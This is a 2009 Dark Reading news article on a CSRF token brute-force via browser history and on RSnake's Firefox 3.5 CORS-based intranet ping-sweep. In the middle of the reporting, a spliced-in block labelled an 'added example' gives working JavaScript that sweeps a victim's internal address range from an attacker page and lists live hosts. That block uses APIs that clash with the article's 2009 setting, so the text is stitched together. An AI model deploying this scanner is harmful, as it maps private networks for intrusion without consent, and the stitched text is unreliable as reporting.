
Endpoint

7/20/2009
03:53 PM

Two Newly Disclosed Hacks Prey On Browser, Web Security

New cross-site request forgery (CSRF) proof-of-concept and Firefox 3.5 hacking tool released

Browser security is still a work in progress, and a pair of new attacks is putting more pressure on already-strained defenses: one hacks protections against cross-site request forgery (CSRF), and another pokes holes in a new browser feature in order to break into intranets.

Researchers Inferno and RSnake separately released their work -- Inferno, a proof-of-concept for finding CSRF defense "tokens" by launching a silent brute-force attack on a client's browser, and RSnake (a.k.a. Robert Hansen), CEO of SecTheory, a new tool that goes after Firefox 3.5's new feature for mashups within Web applications.

Inferno posted a proof-of-concept over the weekend that demonstrates how to grab a CSRF token -- a secret value the application issues to a user and checks on sensitive requests so that forged requests are rejected -- from the user's own browser, and then use it to wage a CSRF attack. His method goes after the client rather than the server, and builds on the so-called XSS History Hack that researcher and WhiteHat Security CTO Jeremiah Grossman revealed three years ago.

"Until now, it was considered infeasible for an attacker to discover your CSRF token using Brute Force Attacks on the server," Inferno blogged, mainly because such an attack would be noisy and therefore easily detectable by an intrusion-detection system (IDS) or Web application firewall (WAF). "Many applications are programmed to invalidate your session after it detects more than a certain number of requests with invalid token values."

Inferno's attack runs inside the victim's browser instead, so it generates very little traffic and goes unnoticed by the IDS and WAF, he says. It builds the set of URLs the user could have loaded, one per possible token value, and checks them against the browser's history using the same visited-link leak Grossman's hack relies on; the one URL that was actually visited reveals the user's CSRF token. Once the attacker has the token, he can bypass CSRF protections.

But "unless I, as an attacker, have your session ID [cookie], I can't figure out what your token is," WhiteHat's Grossman says. "And if I do get your session ID...then, well, you've got bigger problems."

CSRF attacks have been relatively rare, mainly because XSS bugs are so prevalent in Web applications and XSS bugs can be used to get past CSRF defenses, anyway, Grossman says. "So when XSS goes away, these [CSRF] attacks will become more common," he says. "If you can't find an XSS [flaw] on the target Website, this technique is something to put in the toolbox."

But Michael Sutton, vice president of security research at Zscaler, notes this new CSRF hack has its limitations -- namely the number of characters in the token. "While the technique has some value for an attacker, it would have limited application given the restriction that the token be no more than five characters and be included in the URI [uniform resource identifier]," he says. "It is common for such tokens to have a greater length and be passed in cookies or hidden form fields."

RSnake, meanwhile, has built a tool that pokes a hole in Firefox 3.5's cross-origin resource sharing (CORS) feature, which lets a page's JavaScript make XMLHttpRequest calls to other origins and read the responses, for mashing up content, for instance. Mozilla has built defenses into CORS to prevent abuse, such as requiring the remote server to opt in before the browser hands the response to the page, but RSnake says he found a way to work around those defenses. "The server that is going to have information pulled from it has some information that tells the browser it's OK to pull this information and return it to the browser's [domain]," he says.

The XMLHttpRequest ping-sweeping tool points the user's browser back at his or her internal network. Whether a host exists at a given intranet address is inferred from timing: a live host answers, even if the browser then refuses to hand the response to the script, while an address with nothing behind it leaves the request hanging until it times out. "If I can tell the difference between the time that a page can be contacted and the time a browser times out because the connection can't be reached, it turns into an internal 'ping,'" RSnake says. "And it lets the browser see what machines are live and not live.

"By getting them to visit a page that's under my control -- via XSS or otherwise -- I can get the user to perform this pseudo ping-sweep. That would enable me to see the layout of the inside of someone's home or office network if they were running Firefox 3.5 or higher with JavaScript enabled globally."

But this is only a first step in an intranet attack, RSnake says. "All I can see is a server sitting there -- I can't see the pages," he says. "But I now know which servers are there and can do a targeted attack on those IP addresses using the cross-domain address."
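The timing trick RSnake describes, as an added example (not his tool, and not Mozilla's code): a live address settles the request quickly, whether with a readable response, a denied cross-origin read or a refused connection, while an unused address makes the request hang until the page's own deadline aborts it. The sweep takes the probe as a parameter so the classification logic can be run offline with a fake; `browserProbe` is what an attacker-controlled page would pass in. The `192.168.1.0/24` range, port 80 and the 2-second deadline are assumptions.

```javascript
// Added example, not RSnake's tool. Browser-side host discovery by timing
// cross-origin requests to intranet addresses.

function expandRange(prefix, from, to) {
  // '192.168.1.' + 1..254 -> candidate URLs (assumption: HTTP on port 80)
  const hosts = [];
  for (let i = from; i <= to; i++) hosts.push(`http://${prefix}${i}/`);
  return hosts;
}

// Issue one probe under a deadline. `probe(url, signal)` returns a promise and
// must honour the AbortSignal; in a real page that is `browserProbe` below.
async function probeHost(probe, url, timeoutMs) {
  const controller = new AbortController();
  const timer = setTimeout(() => controller.abort(), timeoutMs);
  const start = Date.now();
  let up;
  try {
    await probe(url, controller.signal);
    up = true;                                    // readable response: host is up
  } catch (err) {
    // Our own abort means nothing answered before the deadline. Any other
    // failure (cross-origin read denied, connection refused, bad status)
    // means something at that address replied, which is all a ping needs.
    up = !(err && err.name === 'AbortError');
  } finally {
    clearTimeout(timer);
  }
  return { url, up, elapsedMs: Date.now() - start };
}

// Sweep in small batches so a 254-host run does not hit the browser's
// connection limit and turn queueing delay into false "down" verdicts.
async function sweep(hosts, probe, { timeoutMs = 2000, batch = 6 } = {}) {
  const results = [];
  for (let i = 0; i < hosts.length; i += batch) {
    const chunk = hosts.slice(i, i + batch);
    results.push(...(await Promise.all(chunk.map(h => probeHost(probe, h, timeoutMs)))));
  }
  return results;
}

function liveHosts(results) {
  return results.filter(r => r.up).map(r => r.url);
}

// What the attacker's page actually passes in: a plain cross-origin GET. The
// body is almost never readable, but the error itself arrives promptly.
const browserProbe = (url, signal) => fetch(url, { signal, cache: 'no-store' });

// In an attacker-controlled page (assumption: the victim sits on 192.168.1.0/24):
//   sweep(expandRange('192.168.1.', 1, 254), browserProbe)
//     .then(results => console.log(liveHosts(results)));
```

The only signal used is whether the request settled before the deadline, which is why the page does not need to read a single byte of any intranet response: the opt-in that CORS enforces protects the content, not the fact that a host answered.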

"CORS could make JavaScript intranet hacking -- an issue that is still unaddressed by browser vendors -- more stealthy," WhiteHat's Grossman adds.

Zscaler's Sutton, meanwhile, says this is yet another port-scanning method for an attacker. "There are other hacks which can permit intranet port scanning, such as those using XSS," he says. "This is yet another port-scanning technique for an attacker to add to their toolkit -- although it is fairly limited in scope at this point being restricted to Firefox 3.5."

RSnake says he didn't test the attack on Internet Explorer 8.0's similar feature, XDomainRequest.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ...
